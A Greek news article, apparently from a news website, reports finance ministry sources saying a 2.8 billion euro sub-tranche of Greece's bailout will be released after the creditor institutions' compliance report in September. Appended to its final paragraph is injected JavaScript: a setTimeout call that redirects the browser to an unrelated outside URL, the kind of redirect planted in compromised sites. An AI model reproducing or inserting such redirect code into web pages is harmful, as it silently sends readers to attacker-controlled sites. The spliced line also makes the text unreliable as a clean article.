ΥΠΟΙΚ: Εντός προγραμματισμένου πλαισίου η εκταμίευση των 2,8 δισ.

0
11

 

Εντός του προγραμματισμένου πλαισίου βρίσκεται η εκταμίευση της υπο-δόσης των 2,8 δισ. ευρώ, επιμένουν πηγές του υπουργείου Οικονομικών, σύμφωνα με τις οποίες το «πράσινο φως» για την αποδέσμευση των χρημάτων θα δοθεί μετά από την «έκθεση συμμόρφωσης» των εκπροσώπων των θεσμών, που θα επανέλθουν στην Αθήνα στις 12 Σεπτεμβρίου.

Όπως ανέφεραν οι ίδιες πηγές, τις οποίες επικαλείται το Αθηναϊκό – Μακεδονικό Πρακτορείο Ειδήσεων, το ζήτημα της εκταμίευσης της συγκεκριμένης υπο-δόσης δεν θα αποτελούσε έτσι κι αλλιώς αντικείμενο του άτυπου Eurogroup, το οποίο θα συνέλθει στη Μπρατισλάβα, στις 9 Σεπτεμβρίου.

Σημειώνεται ότι δημοσίευμα της Handelsblatt, το οποίο επικαλείται αξιωματούχο της Ευρωζώνης, αναφέρει ότι το Eurogroup δεν πρόκειται να ανάψει άμεσα το πράσινο φως για την εκταμίευση της δόσης, καθώς από τα συνολικά 15 προαπαιτούμενα, η Αθήνα έχει υλοποιήσει μόλις τα δύο.

Σύμφωνα με τους κύκλους του υπουργείου, για να εκταμιευθεί η υπο-δόση, πρέπει να διαπιστώσουν την πρόοδο στην υλοποίηση των δράσεων – ουρά της πρώτης αξιολόγησης, οι Ντέκλαν Κοστέλο (Ευρωπαϊκή Επιτροπή), Ντέλια Βελκουλέσκου (ΔΝΤ), Φραντσέσκο Ντρούντι (ΕΚΤ) και Νικόλα Τζιαμαρόλι (ESM).

Με βάση τα αποτελέσματα των επαφών που θα πραγματοποιήσουν στην Ελλάδα από τις 12 Σεπτεμβρίου και μετά, θα συντάξουν την «έκθεση συμμόρφωσης».
Στη συνέχεια, θα εκταμιευθεί η υπο-δόση των 2,8 δισ. ευρώ, σημαντικό μέρος της οποίας θα οδεύσει για την αποπληρωμή ληξιπρόθεσμων οφειλών του Δημοσίου προς ιδιώτες, κατά τις ίδιες πηγές.

Εξάλλου, εντός του Οκτωβρίου αναμένεται να αρχίσει η δεύτερη αξιολόγηση, η ολοκλήρωση της οποίας συναρτάται άμεσα τόσο με τις συζητήσεις για το χρέος και τα πρωτογενή πλεονάσματα όσο και με μία νέα δόση ύψους 6,1 δισ. ευρώ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here